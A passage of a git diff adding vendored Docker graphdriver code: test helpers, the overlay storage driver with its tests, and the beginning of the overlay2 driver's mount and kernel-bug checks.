"github.com/docker/docker/daemon/graphdriver" +) + +// InitLoopbacks ensures that the loopback devices are properly created within +// the system running the device mapper tests. +func InitLoopbacks() error { + statT, err := getBaseLoopStats() + if err != nil { + return err + } + // create at least 8 loopback files, ya, that is a good number + for i := 0; i < 8; i++ { + loopPath := fmt.Sprintf("/dev/loop%d", i) + // only create new loopback files if they don't exist + if _, err := os.Stat(loopPath); err != nil { + if mkerr := syscall.Mknod(loopPath, + uint32(statT.Mode|syscall.S_IFBLK), int((7<<8)|(i&0xff)|((i&0xfff00)<<12))); mkerr != nil { + return mkerr + } + os.Chown(loopPath, int(statT.Uid), int(statT.Gid)) + } + } + return nil +} + +// getBaseLoopStats inspects /dev/loop0 to collect uid,gid, and mode for the +// loop0 device on the system. If it does not exist we assume 0,0,0660 for the +// stat data +func getBaseLoopStats() (*syscall.Stat_t, error) { + loop0, err := os.Stat("/dev/loop0") + if err != nil { + if os.IsNotExist(err) { + return &syscall.Stat_t{ + Uid: 0, + Gid: 0, + Mode: 0660, + }, nil + } + return nil, err + } + return loop0.Sys().(*syscall.Stat_t), nil +} + +func verifyFile(t testing.TB, path string, mode os.FileMode, uid, gid uint32) { + fi, err := os.Stat(path) + if err != nil { + t.Fatal(err) + } + + if fi.Mode()&os.ModeType != mode&os.ModeType { + t.Fatalf("Expected %s type 0x%x, got 0x%x", path, mode&os.ModeType, fi.Mode()&os.ModeType) + } + + if fi.Mode()&os.ModePerm != mode&os.ModePerm { + t.Fatalf("Expected %s mode %o, got %o", path, mode&os.ModePerm, fi.Mode()&os.ModePerm) + } + + if fi.Mode()&os.ModeSticky != mode&os.ModeSticky { + t.Fatalf("Expected %s sticky 0x%x, got 0x%x", path, mode&os.ModeSticky, fi.Mode()&os.ModeSticky) + } + + if fi.Mode()&os.ModeSetuid != mode&os.ModeSetuid { + t.Fatalf("Expected %s setuid 0x%x, got 0x%x", path, mode&os.ModeSetuid, fi.Mode()&os.ModeSetuid) + } + + if fi.Mode()&os.ModeSetgid != mode&os.ModeSetgid { + t.Fatalf("Expected %s setgid 0x%x, got 0x%x", path, mode&os.ModeSetgid, fi.Mode()&os.ModeSetgid) + } + + if stat, ok := fi.Sys().(*syscall.Stat_t); ok { + if stat.Uid != uid { + t.Fatalf("%s no owned by uid %d", path, uid) + } + if stat.Gid != gid { + t.Fatalf("%s not owned by gid %d", path, gid) + } + } +} + +func createBase(t testing.TB, driver graphdriver.Driver, name string) { + // We need to be able to set any perms + oldmask := syscall.Umask(0) + defer syscall.Umask(oldmask) + + if err := driver.CreateReadWrite(name, "", nil); err != nil { + t.Fatal(err) + } + + dir, err := driver.Get(name, "") + if err != nil { + t.Fatal(err) + } + defer driver.Put(name) + + subdir := path.Join(dir, "a subdir") + if err := os.Mkdir(subdir, 0705|os.ModeSticky); err != nil { + t.Fatal(err) + } + if err := os.Chown(subdir, 1, 2); err != nil { + t.Fatal(err) + } + + file := path.Join(dir, "a file") + if err := ioutil.WriteFile(file, []byte("Some data"), 0222|os.ModeSetuid); err != nil { + t.Fatal(err) + } +} + +func verifyBase(t testing.TB, driver graphdriver.Driver, name string) { + dir, err := driver.Get(name, "") + if err != nil { + t.Fatal(err) + } + defer driver.Put(name) + + subdir := path.Join(dir, "a subdir") + verifyFile(t, subdir, 0705|os.ModeDir|os.ModeSticky, 1, 2) + + file := path.Join(dir, "a file") + verifyFile(t, file, 0222|os.ModeSetuid, 0, 0) + + fis, err := readDir(dir) + if err != nil { + t.Fatal(err) + } + + if len(fis) != 2 { + t.Fatal("Unexpected files in base image") + } + +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go new file mode 100644 index 0000000000..666a5c0e04 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/copy.go @@ -0,0 +1,174 @@ +// +build linux + +package overlay + +import ( + "fmt" + "os" + "path/filepath" + "syscall" + "time" + + "github.com/docker/docker/pkg/pools" + "github.com/docker/docker/pkg/system" + rsystem "github.com/opencontainers/runc/libcontainer/system" +) + +type copyFlags int + +const ( + copyHardlink copyFlags = 1 << iota +) + +func copyRegular(srcPath, dstPath string, mode os.FileMode) error { + srcFile, err := os.Open(srcPath) + if err != nil { + return err + } + defer srcFile.Close() + + dstFile, err := os.OpenFile(dstPath, os.O_WRONLY|os.O_CREATE, mode) + if err != nil { + return err + } + defer dstFile.Close() + + _, err = pools.Copy(dstFile, srcFile) + + return err +} + +func copyXattr(srcPath, dstPath, attr string) error { + data, err := system.Lgetxattr(srcPath, attr) + if err != nil { + return err + } + if data != nil { + if err := system.Lsetxattr(dstPath, attr, data, 0); err != nil { + return err + } + } + return nil +} + +func copyDir(srcDir, dstDir string, flags copyFlags) error { + err := filepath.Walk(srcDir, func(srcPath string, f os.FileInfo, err error) error { + if err != nil { + return err + } + + // Rebase path + relPath, err := filepath.Rel(srcDir, srcPath) + if err != nil { + return err + } + + dstPath := filepath.Join(dstDir, relPath) + if err != nil { + return err + } + + stat, ok := f.Sys().(*syscall.Stat_t) + if !ok { + return fmt.Errorf("Unable to get raw syscall.Stat_t data for %s", srcPath) + } + + isHardlink := false + + switch f.Mode() & os.ModeType { + case 0: // Regular file + if flags©Hardlink != 0 { + isHardlink = true + if err := os.Link(srcPath, dstPath); err != nil { + return err + } + } else { + if err := copyRegular(srcPath, dstPath, f.Mode()); err != nil { + return err + } + } + + case os.ModeDir: + if err := os.Mkdir(dstPath, f.Mode()); err != nil && !os.IsExist(err) { + return err + } + + case os.ModeSymlink: + link, err := os.Readlink(srcPath) + if err != nil { + return err + } + + if err := os.Symlink(link, dstPath); err != nil { + return err + } + + case os.ModeNamedPipe: + fallthrough + case os.ModeSocket: + if rsystem.RunningInUserNS() { + // cannot create a device if running in user namespace + return nil + } + if err := syscall.Mkfifo(dstPath, stat.Mode); err != nil { + return err + } + + case os.ModeDevice: + if err := syscall.Mknod(dstPath, stat.Mode, int(stat.Rdev)); err != nil { + return err + } + + default: + return fmt.Errorf("Unknown file type for %s\n", srcPath) + } + + // Everything below is copying metadata from src to dst. All this metadata + // already shares an inode for hardlinks. + if isHardlink { + return nil + } + + if err := os.Lchown(dstPath, int(stat.Uid), int(stat.Gid)); err != nil { + return err + } + + if err := copyXattr(srcPath, dstPath, "security.capability"); err != nil { + return err + } + + // We need to copy this attribute if it appears in an overlay upper layer, as + // this function is used to copy those. It is set by overlay if a directory + // is removed and then re-created and should not inherit anything from the + // same dir in the lower dir. + if err := copyXattr(srcPath, dstPath, "trusted.overlay.opaque"); err != nil { + return err + } + + isSymlink := f.Mode()&os.ModeSymlink != 0 + + // There is no LChmod, so ignore mode for symlink. Also, this + // must happen after chown, as that can modify the file mode + if !isSymlink { + if err := os.Chmod(dstPath, f.Mode()); err != nil { + return err + } + } + + // system.Chtimes doesn't support a NOFOLLOW flag atm + if !isSymlink { + aTime := time.Unix(int64(stat.Atim.Sec), int64(stat.Atim.Nsec)) + mTime := time.Unix(int64(stat.Mtim.Sec), int64(stat.Mtim.Nsec)) + if err := system.Chtimes(dstPath, aTime, mTime); err != nil { + return err + } + } else { + ts := []syscall.Timespec{stat.Atim, stat.Mtim} + if err := system.LUtimesNano(dstPath, ts); err != nil { + return err + } + } + return nil + }) + return err +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go new file mode 100644 index 0000000000..121b72e2c3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay.go @@ -0,0 +1,462 @@ +// +build linux + +package overlay + +import ( + "bufio" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "strconv" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/overlayutils" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/fsutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/opencontainers/runc/libcontainer/label" +) + +// This is a small wrapper over the NaiveDiffWriter that lets us have a custom +// implementation of ApplyDiff() + +var ( + // ErrApplyDiffFallback is returned to indicate that a normal ApplyDiff is applied as a fallback from Naive diff writer. + ErrApplyDiffFallback = fmt.Errorf("Fall back to normal ApplyDiff") + backingFs = "" +) + +// ApplyDiffProtoDriver wraps the ProtoDriver by extending the interface with ApplyDiff method. +type ApplyDiffProtoDriver interface { + graphdriver.ProtoDriver + // ApplyDiff writes the diff to the archive for the given id and parent id. + // It returns the size in bytes written if successful, an error ErrApplyDiffFallback is returned otherwise. + ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) +} + +type naiveDiffDriverWithApply struct { + graphdriver.Driver + applyDiff ApplyDiffProtoDriver +} + +// NaiveDiffDriverWithApply returns a NaiveDiff driver with custom ApplyDiff. +func NaiveDiffDriverWithApply(driver ApplyDiffProtoDriver, uidMaps, gidMaps []idtools.IDMap) graphdriver.Driver { + return &naiveDiffDriverWithApply{ + Driver: graphdriver.NewNaiveDiffDriver(driver, uidMaps, gidMaps), + applyDiff: driver, + } +} + +// ApplyDiff creates a diff layer with either the NaiveDiffDriver or with a fallback. +func (d *naiveDiffDriverWithApply) ApplyDiff(id, parent string, diff io.Reader) (int64, error) { + b, err := d.applyDiff.ApplyDiff(id, parent, diff) + if err == ErrApplyDiffFallback { + return d.Driver.ApplyDiff(id, parent, diff) + } + return b, err +} + +// This backend uses the overlay union filesystem for containers +// plus hard link file sharing for images. + +// Each container/image can have a "root" subdirectory which is a plain +// filesystem hierarchy, or they can use overlay. + +// If they use overlay there is a "upper" directory and a "lower-id" +// file, as well as "merged" and "work" directories. The "upper" +// directory has the upper layer of the overlay, and "lower-id" contains +// the id of the parent whose "root" directory shall be used as the lower +// layer in the overlay. The overlay itself is mounted in the "merged" +// directory, and the "work" dir is needed for overlay to work. + +// When an overlay layer is created there are two cases, either the +// parent has a "root" dir, then we start out with an empty "upper" +// directory overlaid on the parents root. This is typically the +// case with the init layer of a container which is based on an image. +// If there is no "root" in the parent, we inherit the lower-id from +// the parent and start by making a copy in the parent's "upper" dir. +// This is typically the case for a container layer which copies +// its parent -init upper layer. + +// Additionally we also have a custom implementation of ApplyLayer +// which makes a recursive copy of the parent "root" layer using +// hardlinks to share file data, and then applies the layer on top +// of that. This means all child images share file (but not directory) +// data with the parent. + +// Driver contains information about the home directory and the list of active mounts that are created using this driver. +type Driver struct { + home string + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap + ctr *graphdriver.RefCounter + supportsDType bool +} + +func init() { + graphdriver.Register("overlay", Init) +} + +// Init returns the NaiveDiffDriver, a native diff driver for overlay filesystem. +// If overlay filesystem is not supported on the host, graphdriver.ErrNotSupported is returned as error. +// If an overlay filesystem is not supported over an existing filesystem then error graphdriver.ErrIncompatibleFS is returned. +func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { + + if err := supportsOverlay(); err != nil { + return nil, graphdriver.ErrNotSupported + } + + fsMagic, err := graphdriver.GetFSMagic(home) + if err != nil { + return nil, err + } + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFs = fsName + } + + switch fsMagic { + case graphdriver.FsMagicAufs, graphdriver.FsMagicBtrfs, graphdriver.FsMagicOverlay, graphdriver.FsMagicZfs, graphdriver.FsMagicEcryptfs: + logrus.Errorf("'overlay' is not supported over %s", backingFs) + return nil, graphdriver.ErrIncompatibleFS + } + + rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps) + if err != nil { + return nil, err + } + // Create the driver home dir + if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil && !os.IsExist(err) { + return nil, err + } + + if err := mount.MakePrivate(home); err != nil { + return nil, err + } + + supportsDType, err := fsutils.SupportsDType(home) + if err != nil { + return nil, err + } + if !supportsDType { + // not a fatal error until v1.16 (#27443) + logrus.Warn(overlayutils.ErrDTypeNotSupported("overlay", backingFs)) + } + + d := &Driver{ + home: home, + uidMaps: uidMaps, + gidMaps: gidMaps, + ctr: graphdriver.NewRefCounter(graphdriver.NewFsChecker(graphdriver.FsMagicOverlay)), + supportsDType: supportsDType, + } + + return NaiveDiffDriverWithApply(d, uidMaps, gidMaps), nil +} + +func supportsOverlay() error { + // We can try to modprobe overlay first before looking at + // proc/filesystems for when overlay is supported + exec.Command("modprobe", "overlay").Run() + + f, err := os.Open("/proc/filesystems") + if err != nil { + return err + } + defer f.Close() + + s := bufio.NewScanner(f) + for s.Scan() { + if s.Text() == "nodev\toverlay" { + return nil + } + } + logrus.Error("'overlay' not found as a supported filesystem on this host. Please ensure kernel is new enough and has overlay support loaded.") + return graphdriver.ErrNotSupported +} + +func (d *Driver) String() string { + return "overlay" +} + +// Status returns current driver information in a two dimensional string array. +// Output contains "Backing Filesystem" used in this implementation. +func (d *Driver) Status() [][2]string { + return [][2]string{ + {"Backing Filesystem", backingFs}, + {"Supports d_type", strconv.FormatBool(d.supportsDType)}, + } +} + +// GetMetadata returns meta data about the overlay driver such as root, LowerDir, UpperDir, WorkDir and MergeDir used to store data. +func (d *Driver) GetMetadata(id string) (map[string]string, error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return nil, err + } + + metadata := make(map[string]string) + + // If id has a root, it is an image + rootDir := path.Join(dir, "root") + if _, err := os.Stat(rootDir); err == nil { + metadata["RootDir"] = rootDir + return metadata, nil + } + + lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id")) + if err != nil { + return nil, err + } + + metadata["LowerDir"] = path.Join(d.dir(string(lowerID)), "root") + metadata["UpperDir"] = path.Join(dir, "upper") + metadata["WorkDir"] = path.Join(dir, "work") + metadata["MergedDir"] = path.Join(dir, "merged") + + return metadata, nil +} + +// Cleanup any state created by overlay which should be cleaned when daemon +// is being shutdown. For now, we just have to unmount the bind mounted +// we had created. +func (d *Driver) Cleanup() error { + return mount.Unmount(d.home) +} + +// CreateReadWrite creates a layer that is writable for use as a container +// file system. +func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error { + return d.Create(id, parent, opts) +} + +// Create is used to create the upper, lower, and merge directories required for overlay fs for a given id. +// The parent filesystem is used to configure these directories for the overlay. +func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) (retErr error) { + + if opts != nil && len(opts.StorageOpt) != 0 { + return fmt.Errorf("--storage-opt is not supported for overlay") + } + + dir := d.dir(id) + + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return err + } + if err := idtools.MkdirAllAs(path.Dir(dir), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(dir, 0700, rootUID, rootGID); err != nil { + return err + } + + defer func() { + // Clean up on failure + if retErr != nil { + os.RemoveAll(dir) + } + }() + + // Toplevel images are just a "root" dir + if parent == "" { + if err := idtools.MkdirAs(path.Join(dir, "root"), 0755, rootUID, rootGID); err != nil { + return err + } + return nil + } + + parentDir := d.dir(parent) + + // Ensure parent exists + if _, err := os.Lstat(parentDir); err != nil { + return err + } + + // If parent has a root, just do an overlay to it + parentRoot := path.Join(parentDir, "root") + + if s, err := os.Lstat(parentRoot); err == nil { + if err := idtools.MkdirAs(path.Join(dir, "upper"), s.Mode(), rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(dir, "lower-id"), []byte(parent), 0666); err != nil { + return err + } + return nil + } + + // Otherwise, copy the upper and the lower-id from the parent + + lowerID, err := ioutil.ReadFile(path.Join(parentDir, "lower-id")) + if err != nil { + return err + } + + if err := ioutil.WriteFile(path.Join(dir, "lower-id"), lowerID, 0666); err != nil { + return err + } + + parentUpperDir := path.Join(parentDir, "upper") + s, err := os.Lstat(parentUpperDir) + if err != nil { + return err + } + + upperDir := path.Join(dir, "upper") + if err := idtools.MkdirAs(upperDir, s.Mode(), rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "work"), 0700, rootUID, rootGID); err != nil { + return err + } + if err := idtools.MkdirAs(path.Join(dir, "merged"), 0700, rootUID, rootGID); err != nil { + return err + } + + return copyDir(parentUpperDir, upperDir, 0) +} + +func (d *Driver) dir(id string) string { + return path.Join(d.home, id) +} + +// Remove cleans the directories that are created for this id. +func (d *Driver) Remove(id string) error { + if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) { + return err + } + return nil +} + +// Get creates and mounts the required file system for the given id and returns the mount path. +func (d *Driver) Get(id string, mountLabel string) (s string, err error) { + dir := d.dir(id) + if _, err := os.Stat(dir); err != nil { + return "", err + } + // If id has a root, just return it + rootDir := path.Join(dir, "root") + if _, err := os.Stat(rootDir); err == nil { + return rootDir, nil + } + mergedDir := path.Join(dir, "merged") + if count := d.ctr.Increment(mergedDir); count > 1 { + return mergedDir, nil + } + defer func() { + if err != nil { + if c := d.ctr.Decrement(mergedDir); c <= 0 { + syscall.Unmount(mergedDir, 0) + } + } + }() + lowerID, err := ioutil.ReadFile(path.Join(dir, "lower-id")) + if err != nil { + return "", err + } + var ( + lowerDir = path.Join(d.dir(string(lowerID)), "root") + upperDir = path.Join(dir, "upper") + workDir = path.Join(dir, "work") + opts = fmt.Sprintf("lowerdir=%s,upperdir=%s,workdir=%s", lowerDir, upperDir, workDir) + ) + if err := syscall.Mount("overlay", mergedDir, "overlay", 0, label.FormatMountLabel(opts, mountLabel)); err != nil { + return "", fmt.Errorf("error creating overlay mount to %s: %v", mergedDir, err) + } + // chown "workdir/work" to the remapped root UID/GID. Overlay fs inside a + // user namespace requires this to move a directory from lower to upper. + rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) + if err != nil { + return "", err + } + if err := os.Chown(path.Join(workDir, "work"), rootUID, rootGID); err != nil { + return "", err + } + return mergedDir, nil +} + +// Put unmounts the mount path created for the give id. +func (d *Driver) Put(id string) error { + // If id has a root, just return + if _, err := os.Stat(path.Join(d.dir(id), "root")); err == nil { + return nil + } + mountpoint := path.Join(d.dir(id), "merged") + if count := d.ctr.Decrement(mountpoint); count > 0 { + return nil + } + if err := syscall.Unmount(mountpoint, 0); err != nil { + logrus.Debugf("Failed to unmount %s overlay: %v", id, err) + } + return nil +} + +// ApplyDiff applies the new layer on top of the root, if parent does not exist with will return an ErrApplyDiffFallback error. +func (d *Driver) ApplyDiff(id string, parent string, diff io.Reader) (size int64, err error) { + dir := d.dir(id) + + if parent == "" { + return 0, ErrApplyDiffFallback + } + + parentRootDir := path.Join(d.dir(parent), "root") + if _, err := os.Stat(parentRootDir); err != nil { + return 0, ErrApplyDiffFallback + } + + // We now know there is a parent, and it has a "root" directory containing + // the full root filesystem. We can just hardlink it and apply the + // layer. This relies on two things: + // 1) ApplyDiff is only run once on a clean (no writes to upper layer) container + // 2) ApplyDiff doesn't do any in-place writes to files (would break hardlinks) + // These are all currently true and are not expected to break + + tmpRootDir, err := ioutil.TempDir(dir, "tmproot") + if err != nil { + return 0, err + } + defer func() { + if err != nil { + os.RemoveAll(tmpRootDir) + } else { + os.RemoveAll(path.Join(dir, "upper")) + os.RemoveAll(path.Join(dir, "work")) + os.RemoveAll(path.Join(dir, "merged")) + os.RemoveAll(path.Join(dir, "lower-id")) + } + }() + + if err = copyDir(parentRootDir, tmpRootDir, copyHardlink); err != nil { + return 0, err + } + + options := &archive.TarOptions{UIDMaps: d.uidMaps, GIDMaps: d.gidMaps} + if size, err = graphdriver.ApplyUncompressedLayer(tmpRootDir, diff, options); err != nil { + return 0, err + } + + rootDir := path.Join(dir, "root") + if err := os.Rename(tmpRootDir, rootDir); err != nil { + return 0, err + } + + return +} + +// Exists checks to see if the id is already mounted. +func (d *Driver) Exists(id string) bool { + _, err := os.Stat(d.dir(id)) + return err == nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go new file mode 100644 index 0000000000..34b6d801fd --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_test.go @@ -0,0 +1,93 @@ +// +build linux + +package overlay + +import ( + "testing" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/graphtest" + "github.com/docker/docker/pkg/archive" +) + +func init() { + // Do not sure chroot to speed run time and allow archive + // errors or hangs to be debugged directly from the test process. + graphdriver.ApplyUncompressedLayer = archive.ApplyUncompressedLayer +} + +// This avoids creating a new driver for each test if all tests are run +// Make sure to put new tests between TestOverlaySetup and TestOverlayTeardown +func TestOverlaySetup(t *testing.T) { + graphtest.GetDriver(t, "overlay") +} + +func TestOverlayCreateEmpty(t *testing.T) { + graphtest.DriverTestCreateEmpty(t, "overlay") +} + +func TestOverlayCreateBase(t *testing.T) { + graphtest.DriverTestCreateBase(t, "overlay") +} + +func TestOverlayCreateSnap(t *testing.T) { + graphtest.DriverTestCreateSnap(t, "overlay") +} + +func TestOverlay50LayerRead(t *testing.T) { + graphtest.DriverTestDeepLayerRead(t, 50, "overlay") +} + +// Fails due to bug in calculating changes after apply +// likely related to https://github.com/docker/docker/issues/21555 +func TestOverlayDiffApply10Files(t *testing.T) { + t.Skipf("Fails to compute changes after apply intermittently") + graphtest.DriverTestDiffApply(t, 10, "overlay") +} + +func TestOverlayChanges(t *testing.T) { + t.Skipf("Fails to compute changes intermittently") + graphtest.DriverTestChanges(t, "overlay") +} + +func TestOverlayTeardown(t *testing.T) { + graphtest.PutDriver(t) +} + +// Benchmarks should always setup new driver + +func BenchmarkExists(b *testing.B) { + graphtest.DriverBenchExists(b, "overlay") +} + +func BenchmarkGetEmpty(b *testing.B) { + graphtest.DriverBenchGetEmpty(b, "overlay") +} + +func BenchmarkDiffBase(b *testing.B) { + graphtest.DriverBenchDiffBase(b, "overlay") +} + +func BenchmarkDiffSmallUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10, "overlay") +} + +func BenchmarkDiff10KFileUpper(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10, 10000, "overlay") +} + +func BenchmarkDiff10KFilesBottom(b *testing.B) { + graphtest.DriverBenchDiffN(b, 10000, 10, "overlay") +} + +func BenchmarkDiffApply100(b *testing.B) { + graphtest.DriverBenchDiffApplyN(b, 100, "overlay") +} + +func BenchmarkDiff20Layers(b *testing.B) { + graphtest.DriverBenchDeepLayerDiff(b, 20, "overlay") +} + +func BenchmarkRead20Layers(b *testing.B) { + graphtest.DriverBenchDeepLayerRead(b, 20, "overlay") +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go new file mode 100644 index 0000000000..3dbb4de44e --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay/overlay_unsupported.go @@ -0,0 +1,3 @@ +// +build !linux + +package overlay diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go new file mode 100644 index 0000000000..53a7199292 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/check.go @@ -0,0 +1,79 @@ +// +build linux + +package overlay2 + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "path/filepath" + "syscall" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/system" + "github.com/pkg/errors" +) + +// hasOpaqueCopyUpBug checks whether the filesystem has a bug +// which copies up the opaque flag when copying up an opaque +// directory. When this bug exists naive diff should be used. +func hasOpaqueCopyUpBug(d string) error { + td, err := ioutil.TempDir(d, "opaque-bug-check") + if err != nil { + return err + } + defer func() { + if err := os.RemoveAll(td); err != nil { + logrus.Warnf("Failed to remove check directory %v: %v", td, err) + } + }() + + // Make directories l1/d, l2/d, l3, work, merged + if err := os.MkdirAll(filepath.Join(td, "l1", "d"), 0755); err != nil { + return err + } + if err := os.MkdirAll(filepath.Join(td, "l2", "d"), 0755); err != nil { + return err + } + if err := os.Mkdir(filepath.Join(td, "l3"), 0755); err != nil { + return err + } + if err := os.Mkdir(filepath.Join(td, "work"), 0755); err != nil { + return err + } + if err := os.Mkdir(filepath.Join(td, "merged"), 0755); err != nil { + return err + } + + // Mark l2/d as opaque + if err := system.Lsetxattr(filepath.Join(td, "l2", "d"), "trusted.overlay.opaque", []byte("y"), 0); err != nil { + return errors.Wrap(err, "failed to set opaque flag on middle layer") + } + + opts := fmt.Sprintf("lowerdir=%s:%s,upperdir=%s,workdir=%s", path.Join(td, "l2"), path.Join(td, "l1"), path.Join(td, "l3"), path.Join(td, "work")) + if err := syscall.Mount("overlay", filepath.Join(td, "merged"), "overlay", 0, opts); err != nil { + return errors.Wrap(err, "failed to mount overlay") + } + defer func() { + if err := syscall.Unmount(filepath.Join(td, "merged"), 0); err != nil { + logrus.Warnf("Failed to unmount check directory %v: %v", filepath.Join(td, "merged"), err) + } + }() + + // Touch file in d to force copy up of opaque directory "d" from "l2" to "l3" + if err := ioutil.WriteFile(filepath.Join(td, "merged", "d", "f"), []byte{}, 0644); err != nil { + return errors.Wrap(err, "failed to write to merged directory") + } + + // Check l3/d does not have opaque flag + xattrOpaque, err := system.Lgetxattr(filepath.Join(td, "l3", "d"), "trusted.overlay.opaque") + if err != nil { + return errors.Wrap(err, "failed to read opaque flag on upper layer") + } + if string(xattrOpaque) == "y" { + return errors.New("opaque flag erroneously copied up, consider update to kernel 4.8 or later to fix") + } + + return nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go new file mode 100644 index 0000000000..60e248b6d7 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/mount.go @@ -0,0 +1,88 @@ +// +build linux + +package overlay2 + +import ( + "bytes" + "encoding/json" + "flag" + "fmt" + "os" + "runtime" + "syscall" + + "github.com/docker/docker/pkg/reexec" +) + +func init() { + reexec.Register("docker-mountfrom", mountFromMain) +} + +func fatal(err error) { + fmt.Fprint(os.Stderr, err) + os.Exit(1) +} + +type mountOptions struct { + Device string + Target string + Type string + Label string + Flag uint32 +} + +func mountFrom(dir, device, target, mType string, flags uintptr, label string) error { + options := &mountOptions{ + Device: device, + Target: target, + Type: mType, + Flag: uint32(flags), + Label: label, + } + + cmd := reexec.Command("docker-mountfrom", dir) + w, err := cmd.StdinPipe() + if err != nil { + return fmt.Errorf("mountfrom error on pipe creation: %v", err) + } + + output := bytes.NewBuffer(nil) + cmd.Stdout = output + cmd.Stderr = output + + if err := cmd.Start(); err != nil { + return fmt.Errorf("mountfrom error on re-exec cmd: %v", err) + } + //write the options to the pipe for the untar exec to read + if err := json.NewEncoder(w).Encode(options); err != nil { + return fmt.Errorf("mountfrom json encode to pipe failed: %v", err) + } + w.Close() + + if err := cmd.Wait(); err != nil { + return fmt.Errorf("mountfrom re-exec error: %v: output: %s", err, output) + } + return nil +} + +// mountfromMain is the entry-point for docker-mountfrom on re-exec. +func mountFromMain() { + runtime.LockOSThread() + flag.Parse() + + var options *mountOptions + + if err := json.NewDecoder(os.Stdin).Decode(&options); err != nil { + fatal(err) + } + + if err := os.Chdir(flag.Arg(0)); err != nil { + fatal(err) + } + + if err := syscall.Mount(options.Device, options.Target, options.Type, uintptr(options.Flag), options.Label); err != nil { + fatal(err) + } + + os.Exit(0) +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go new file mode 100644 index 0000000000..65ac6bfaeb --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlay2/overlay.go @@ -0,0 +1,662 @@ +// +build linux + +package overlay2 + +import ( + "bufio" + "errors" + "fmt" + "io" + "io/ioutil" + "os" + "os/exec" + "path" + "path/filepath" + "strconv" + "strings" + "sync" + "syscall" + + "github.com/Sirupsen/logrus" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/daemon/graphdriver/overlayutils" + "github.com/docker/docker/daemon/graphdriver/quota" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/directory" + "github.com/docker/docker/pkg/fsutils" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/mount" + "github.com/docker/docker/pkg/parsers" + "github.com/docker/docker/pkg/parsers/kernel" + "github.com/docker/go-units" + + "github.com/opencontainers/runc/libcontainer/label" +) + +var ( + // untar defines the untar method + untar = chrootarchive.UntarUncompressed +) + +// This backend uses the overlay union filesystem for containers +// with diff directories for each layer. + +// This version of the overlay driver requires at least kernel +// 4.0.0 in order to support mounting multiple diff directories. + +// Each container/image has at least a "diff" directory and "link" file. +// If there is also a "lower" file when there are diff layers +// below as well as "merged" and "work" directories. The "diff" directory +// has the upper layer of the overlay and is used to capture any +// changes to the layer. The "lower" file contains all the lower layer +// mounts separated by ":" and ordered from uppermost to lowermost +// layers. The overlay itself is mounted in the "merged" directory, +// and the "work" dir is needed for overlay to work. + +// The "link" file for each layer contains a unique string for the layer. +// Under the "l" directory at the root there will be a symbolic link +// with that unique string pointing the "diff" directory for the layer. +// The symbolic links are used to reference lower layers in the "lower" +// file and on mount. The links are used to shorten the total length +// of a layer reference without requiring changes to the layer identifier +// or root directory. Mounts are always done relative to root and +// referencing the symbolic links in order to ensure the number of +// lower directories can fit in a single page for making the mount +// syscall. A hard upper limit of 128 lower layers 